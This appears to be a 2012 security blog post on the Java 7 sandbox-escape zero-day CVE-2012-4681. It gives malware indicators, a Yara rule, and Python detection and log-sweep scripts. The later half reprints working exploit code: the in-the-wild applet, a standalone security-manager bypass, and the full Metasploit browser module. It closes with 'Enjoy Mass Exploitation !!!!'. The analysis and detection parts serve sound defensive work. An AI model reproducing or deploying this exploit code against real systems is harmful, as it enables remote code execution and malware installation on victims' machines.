Wednesday, August 29, 2012

New Java 0day exploited in the wild


Two days ago, FireEye published information about a new Java 0day being exploited in the wild.
The malicious JAR file was served from ok.aa24.net / meeting / index.html.
The HTML loads the Java applet, passing it parameters that the applet later uses to build the URL
from which the payload is downloaded. The HTML is obfuscated with "Dadong's JSXX 0.44 VIP".

[IMG]


The Java applet contains the following two .class files:
- cve2012xxxx/Gondzz.class
- cve2012xxxx/Gondvv.class
The applet checks whether the system is running Windows and reads the parameters passed from the HTML, which contain the URL of the payload. If the system is vulnerable, the payload is downloaded and executed.
[IMG]

[IMG]


In the analyzed sample the payload is downloaded from ok.aa24.net / meeting / hi.exe.
The payload drops C:\WINDOWS\system32\mspmsnsv.dll (replacing the file if present) and starts the Portable Media Serial Number Service.
The malware connects to hello.icon.pk on port 80. It appears to be a Poison Ivy variant.
hello.icon.pk resolves to 223.25.233.244, in the range 223.25.233.0 – 223.25.233.255 (8 to Infinity Pte Ltd).
You can use the following generic Yara rule to detect a malicious .class file exploiting this vulnerability:
rule Java0daycve2012xxxx_generic
{
    meta:
        weight = 100
        author = "Jaime Blasco"
        source = "alienvault"
        date = "2012-08"
    strings:
        $ = "java/security/ProtectionDomain"
        $ = "java/security/Permissions"
        $ = "java/security/cert/Certificate"
        $ = "setSecurityManager"
        $ = "file:///"
        $ = "sun.awt.SunToolkit"
        $ = "getField"
    condition:
        all of them
}
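The rule works because of the combination: getField, setSecurityManager and the java/security types are individually common in benign code, so the condition is "all of them". In a compiled class these strings sit in the constant pool, as class/descriptor names and as the String literals handed to java.beans.Expression and Statement. The following Python is an added example, not part of the original post or of the AlienVault rule: it walks a .class file's constant pool (handling the two-slot Long/Double entries that trip up naive walkers), applies the same seven indicators to the CONSTANT_Utf8 entries, and checks every class inside a JAR. The class stubs and the JAR it builds for its own test are constructed here and are not loadable classes.

```python
import io
import struct
import zipfile
from typing import Dict, List, Set

# The seven strings from the generic Yara rule above.
INDICATORS = (
    b"java/security/ProtectionDomain",
    b"java/security/Permissions",
    b"java/security/cert/Certificate",
    b"setSecurityManager",
    b"file:///",
    b"sun.awt.SunToolkit",
    b"getField",
)

# Payload sizes of the fixed-width constant-pool entries (JVMS 4.4), by tag.
_FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
               12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def utf8_constants(data: bytes) -> List[bytes]:
    """Return every CONSTANT_Utf8 payload in a .class file's constant pool.

    Only the header and the pool are walked; fields, methods and attributes
    follow the pool and are not needed for this check.
    """
    if len(data) < 10 or data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack_from(">H", data, 8)  # constant_pool_count
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                                # CONSTANT_Utf8
            (length,) = struct.unpack_from(">H", data, pos)
            pos += 2
            out.append(data[pos:pos + length])
            pos += length
        elif tag in _FIXED_SIZE:
            pos += _FIXED_SIZE[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        # CONSTANT_Long and CONSTANT_Double occupy two pool slots; a walker
        # that forgets this desynchronises on the first class with a long literal.
        idx += 2 if tag in (5, 6) else 1
    return out


def missing_indicators(class_bytes: bytes) -> Set[bytes]:
    """Indicators that do not occur as a substring of any Utf8 constant."""
    pool = utf8_constants(class_bytes)
    return {ind for ind in INDICATORS if not any(ind in entry for entry in pool)}


def rule_fires(class_bytes: bytes) -> bool:
    """Equivalent of the Yara condition 'all of them'."""
    return not missing_indicators(class_bytes)


def scan_jar(jar_bytes: bytes) -> List[str]:
    """Names of the .class entries in a JAR that trip the rule."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return [name for name in zf.namelist()
                if name.endswith(".class") and rule_fires(zf.read(name))]


def build_class_stub(utf8s: List[bytes], with_long: bool = False) -> bytes:
    """Constructed test input: a class header plus a constant pool, nothing else.

    Not a loadable class; it only exercises the pool walker.
    """
    pool, slots = b"", 0
    if with_long:
        pool += b"\x05" + struct.pack(">Q", 0x0102030405060708)  # CONSTANT_Long, 2 slots
        slots += 2
    for s in utf8s:
        pool += b"\x01" + struct.pack(">H", len(s)) + s
        slots += 1
    pool += b"\x07" + struct.pack(">H", 1)   # CONSTANT_Class (index irrelevant here)
    slots += 1
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 51)  # major 51 == Java 7
    return header + struct.pack(">H", slots + 1) + pool


def build_jar(entries: Dict[str, bytes]) -> bytes:
    """Constructed test input: an in-memory JAR with the given entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    suspicious = build_class_stub(list(INDICATORS) + [b"cve2012xxxx/Gondvv"], with_long=True)
    print("rule fires:", rule_fires(suspicious))  # True
    print("missing:", missing_indicators(build_class_stub([b"java/lang/Object"])))
```

The Yara rule itself runs over the raw class bytes; this walker applies the same strings to constant-pool entries only, which is where they occur in a compiled class, so the two agree on real .class files while the walker gives you the list of which indicators are missing when a sample almost matches.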
A Metasploit module has just been published, so it is time to disable Java on all your systems.
And remember to search your logs for connections to the domains and IPs related to this attack.
Have a great day!

Details about the exploited vulnerability:
1. The JavaScript in index.html is heavily obfuscated.

2. This vulnerability affects Java 7 (1.7) Update 0 to 6. It does NOT affect Java 6 and below.

3. It works in all common versions of Internet Explorer, Firefox, and Opera. It did NOT work in Chrome with the original exploit. (Update: the original exploit we tested did not affect Chrome. We did not test Metasploit, but reports are that their module works in all browsers. Disable Java support in your browser.)

4. It does not crash browsers (which does NOT mean it does not work!). The landing page looks like a blank page (for the original exploit only; future variants may differ); sometimes one may see a flash of a rotating Java logo and the word "Loading".

[IMG]
5. The malicious Java applet is downloaded as shown in the picture below. At this point, if your system is not vulnerable or is patched, the attack stops. From the user's perspective it is impossible to tell whether the attack succeeded.
6. If the exploit is successful, it downloads and executes a malicious binary, which calls out to another IP address/domain: hello.icon.pk / 223.25.233.244
[IMG]
img. 1

7. Although older Java is not vulnerable to this attack, downgrading is not recommended because of the many other vulnerabilities in older versions of Java.
8. Disable Java in your browser, apply the patch (see below), or use Chrome (see the note on Chrome below).

Malware behavior and indicators
Payload: hi.exe, size 16896 bytes
MD5: 4A55BF1448262BF71707EEF7FC168F7D (VirusTotal 26/42)
  1. The legitimate Portable Media Serial Number Service DLL, MsPMSNSv.dll, is deleted from C:\WINDOWS\system32 (VirusTotal 0/42).
  2. The malicious mspmsnsv.dll is copied to C:\WINDOWS\system32 (VirusTotal 21/42).
  3. The "Portable Media Serial Number Service" (WmdmPmSN in the registry) is running.
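The advice above to search your logs for connections to the attack infrastructure is easy to do badly (a plain grep for "aa24.net" misses the IP range and flags look-alike names). The following Python is an added example, not part of the original write-up: it sweeps proxy log lines for the network indicators collected on this page (ok.aa24.net, hello.icon.pk, the 223.25.233.0/24 range the C2 resolves into, and 59.120.154.62, the landing host's IP from the comment in the exploit source below), matching domains with subdomains, IPs by network membership, and the /meeting/ URL paths as a weaker signal. The Squid-style log lines and their hosts are constructed for the example; only the indicators come from the page.

```python
import ipaddress
import re
from typing import Dict, Iterable, List

# Network indicators from the write-up: landing/payload host, C2 host and its
# hosting range, and the landing host's IP from the exploit source comment.
IOC_DOMAINS = {"ok.aa24.net", "hello.icon.pk"}
IOC_NETWORKS = [
    ipaddress.ip_network("223.25.233.0/24"),   # hello.icon.pk -> 223.25.233.244 and its range
    ipaddress.ip_network("59.120.154.62/32"),  # ok.aa24.net per the exploit source comment
]
# Paths seen on the landing host; generic enough to be only a weak signal elsewhere.
IOC_PATHS = {"/meeting/index.html", "/meeting/hi.exe"}

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_HOST = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
_URL_PATH = re.compile(r"https?://[^/\s]+(/[^\s\"]*)", re.I)

# Constructed sample (Squid-like: time client result method url - server_ip).
# Hosts other than the indicators are documentation/example names.
SAMPLE_PROXY_LOG = """\
1346220000.123 192.168.1.20 TCP_MISS/200 GET http://www.example.org/index.html - 93.184.216.34
1346220005.456 192.168.1.20 TCP_MISS/200 GET http://ok.aa24.net/meeting/index.html - 59.120.154.62
1346220006.789 192.168.1.20 TCP_MISS/200 GET http://ok.aa24.net/meeting/hi.exe - 59.120.154.62
1346220010.000 192.168.1.20 TCP_MISS/200 POST http://hello.icon.pk/ - 223.25.233.244
1346220011.000 192.168.1.44 TCP_MISS/200 GET http://223.25.233.17/ - 223.25.233.17
1346220012.000 192.168.1.44 TCP_MISS/200 GET http://mirror.example.net/meeting/index.html - 198.51.100.7
"""


def domain_hit(host: str) -> bool:
    """True for an IOC domain or a subdomain of it, not for look-alikes (notok.aa24.net)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def ip_hit(ip: str) -> bool:
    """True when the address falls inside one of the IOC networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in IOC_NETWORKS)


def sweep(lines: Iterable[str]) -> List[Dict[str, object]]:
    """One record per matching line: line number, sorted reasons, confidence, text.

    A hit backed only by a URL path is reported as low confidence, since the
    same path on an unrelated host proves nothing by itself.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = []
        reasons += [f"domain:{h.lower()}" for h in set(_HOST.findall(line)) if domain_hit(h)]
        reasons += [f"ip:{ip}" for ip in set(_IPV4.findall(line)) if ip_hit(ip)]
        reasons += [f"path:{p}" for p in set(_URL_PATH.findall(line)) if p.lower() in IOC_PATHS]
        if reasons:
            strong = any(not r.startswith("path:") for r in reasons)
            hits.append({
                "line": n,
                "reasons": sorted(reasons),
                "confidence": "high" if strong else "low",
                "text": line.rstrip(),
            })
    return hits


if __name__ == "__main__":
    for hit in sweep(SAMPLE_PROXY_LOG.splitlines()):
        print(f"[{hit['confidence']}] line {hit['line']}: {', '.join(hit['reasons'])}")
```

Feed it real proxy, DNS or firewall lines with `sweep(open(path))`; the regexes only pull hosts, IPs and URL paths out of free text, so the log format does not matter. Treat any high-confidence hit on the C2 range as a likely compromised host that needs the mspmsnsv.dll and WmdmPmSN service checks listed above.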
Patch:
Java 7 Zero Day Buster
by Michael 'mihi' Schierl, <schierlm at gmx.de>, http://schierlm.users.sourceforge.net/
To use, locate the (jre/)lib/security folder in your JDK/JRE (there should be a
file called cacerts in it), create a folder (jre/)lib/endorsed next to it and
place this Jar inside it.
The Java VM will load all Jar files in this folder and replace any of its own runtime classes (from rt.jar) with .class files inside these Jars. Note that this feature is not officially supported by Sun/Oracle except for updating XML parser libraries, but it seems to work.
Use this Jar only for Java 7 Update 0 to 6, as other versions may have a different version of the patched class and break horribly. The patch seems to properly block the access vector used by the 0-day circulating at the moment, but I take no responsibility that it fixes all ways this bug can be exploited, nor that it will not break any other existing Java programs.
In other words: create a folder named endorsed under lib in your Java 7 program folder, copy the patch JAR into it, and restart the browser(s).
We tested it and it works well: the applet is downloaded but does not lead to the download and execution of the malicious binary. See the pictures below and compare with the download sequence during the successful exploit (img. 1).


[IMG]
Patched Java 7 with Internet Explorer. No malicious exe download.

[IMG]
Patched Java 7 with Firefox. No malicious exe download.

[IMG]
Java permission request on Chrome

[IMG]
Win XP screenshot. No malicious exe download on Chrome (tested on XP and Windows 7)



Rapid7 / Metasploit indicate that they tested their module on Chrome on Windows XP. In our experience, if Java is allowed to run as shown in the picture above, the malicious binary does not get downloaded. We tested several times with the same result: Java runs, but there is no contact with the second server and no binary download. Testing on the same VM with Internet Explorer or Firefox immediately causes infection. Perhaps Rapid7 'improved' the exploit (you can send them your thanks if you wish), but the original exploit does not work on Chrome.

The raw exploit code found in the wild (as reposted by jduck; this version runs calc.exe where the real applet fetched hi.exe):

Code:
//
// CVE-2012-XXXX Java 0day
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    // Turns the sandbox off. A java.beans.Statement wraps the call
    // System.setSecurityManager(null); Statement.execute() runs it under the
    // AccessControlContext kept in its private "acc" field, which normally
    // carries the applet's restricted permissions. That field is overwritten
    // with a context holding AllPermission before the call is made.
    public void disableSecurity()
        throws Throwable
    {
        // new Object[1] is a single null argument, i.e. setSecurityManager(null)
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        // A ProtectionDomain for a fake local ("file:///") code source with all permissions
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        // Replace Statement.acc with the all-permission context ...
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        // ... and run setSecurityManager(null) under it.
        localStatement.execute();
    }

    // Class.forName(name) invoked through java.beans.Expression, so the applet
    // never references the restricted sun.awt.* package directly (direct access
    // is stopped by the package-access check); the bug lets the indirect
    // lookup through the beans machinery return the restricted class anyway.
    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    // sun.awt.SunToolkit.getField(Class, String) hands back a private Field
    // with setAccessible(true) already applied; it is used here to write
    // paramObject2 into the field named paramString of paramObject1.
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            // This proof of concept pops calc.exe; the in-the-wild applet
            // instead downloads and runs the hi.exe payload described above.
            Process localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null)
                localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        // The "Loading" text users sometimes glimpse on the landing page
        paramGraphics.drawString("Loading", 50, 25);
    }
}

Here is the updated exploit, a standalone test case rather than an applet: run under a security manager, it disables the manager and lists C:\ as proof.
Save it as Java7ZeroDay.java (the public class name must match the file name):

Code:
import java.beans.*;
import java.io.File;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

import com.sun.beans.finder.ClassFinder;

public class Java7ZeroDay {

    public static void disableSecurity() throws Throwable {

        // get access to sun.awt.SunToolkit, which is in a restricted package,
        // so this should NOT work...
        Class<?> sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");

        // the rest is just a short way to exploit having access to that class.

        // we have to call everything "indirectly" since the verifier would
        // refuse to load the class if it directly tried to call that methods.

        // call SunToolkit.getField to get an accessor to private "acc" field of
        // Statement.class. (That method is new in Java 7, but there are plenty
        // of other (more convoluted) ways in earlier versions to elevate
        // permissions if you have access to restricted packages).
        Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
        expr.execute();
        Field acc_Field = ((Field) expr.getValue());

        // create an access control context with all permissions
        Permissions allPerms = new Permissions();
        allPerms.add(new AllPermission());
        AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
                new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
        });

        // create a statement that disabled the security manager, to run in our
        // own untrusted access control context
        Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);

        // use our private acc field accessor to change the access control
        // context of the statement above to the access control context with all
        // permissions
        acc_Field.set(disableSecurityManager, allPermAcc);

        // and call it (now that it has all permissions)
        disableSecurityManager.execute();
    }

    // test method, call this like this
    // java -Djava.security.manager Java7ZeroDay
    public static void main(String[] args) throws Throwable {
        try {
            new File("C:/").list();
            System.out.println("No Security Manager present");
        } catch (SecurityException ex) {
            disableSecurity();
            System.out.println("Security Manager disabled. Proof:");
            for (File file : new File("C:/").listFiles())
                System.out.println("\t" + file);
        }
    }
}


The Metasploit module

Metasploit shipped a module for this vulnerability (java_jre17_exec.rb, CVE-2012-4681) while Oracle had no patch out and the bug was being exploited in the wild. Update your Metasploit installation to get it and, on the defensive side, disable Java in browsers. The module source:

java_jre17_exec.rb

Code:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java 7 Applet Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in Java 7, which allows an attacker to run
        arbitrary Java code outside the sandbox. The vulnerability seems to be related to
        the use of the newly introduced ClassFinder#resolveClass in Java 7, which allows
        the sun.awt.SunToolkit class to be loaded and modified. Please note this flaw is
        also being exploited in the wild, and there is no patch from Oracle at this point.
        Our module has been successfully tested on multiple setups, including: IE, Firefox,
        Chrome and Safari on Windows, Linux and OS X, etc.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',       # Vulnerability Discovery
          'jduck',         # metasploit module
          'sinn3r',        # metasploit module
          'juan vazquez',  # metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4681' ],
          [ 'OSVDB', '84867' ],
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
        ],
      'Platform'       => [ 'java', 'win', 'linux' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 26 2012'
    ))
  end


  def on_request_uri( cli, request )
    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      print_status("#{self.name} handling request")

      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
      return
    end

    paths = [
      [ "Exploit.class" ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0,idx].join("/") + "/"
        if !(jar.entries.map{|e|e.name}.include?(full))
          jar.add_file(full, '')
        end
      end
      fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
      data = fd.read(fd.stat.size)
      jar.add_file(path.join("/"), data)
      fd.close
    end

    print_status("Sending Applet.jar")
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

    handler( cli )
  end

  def generate_html
    html  = "<html><head></head>"
    html += "<body>"
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
    html += "</applet></body></html>"
    return html
  end

end
 
Enjoy Mass Exploitation !!!!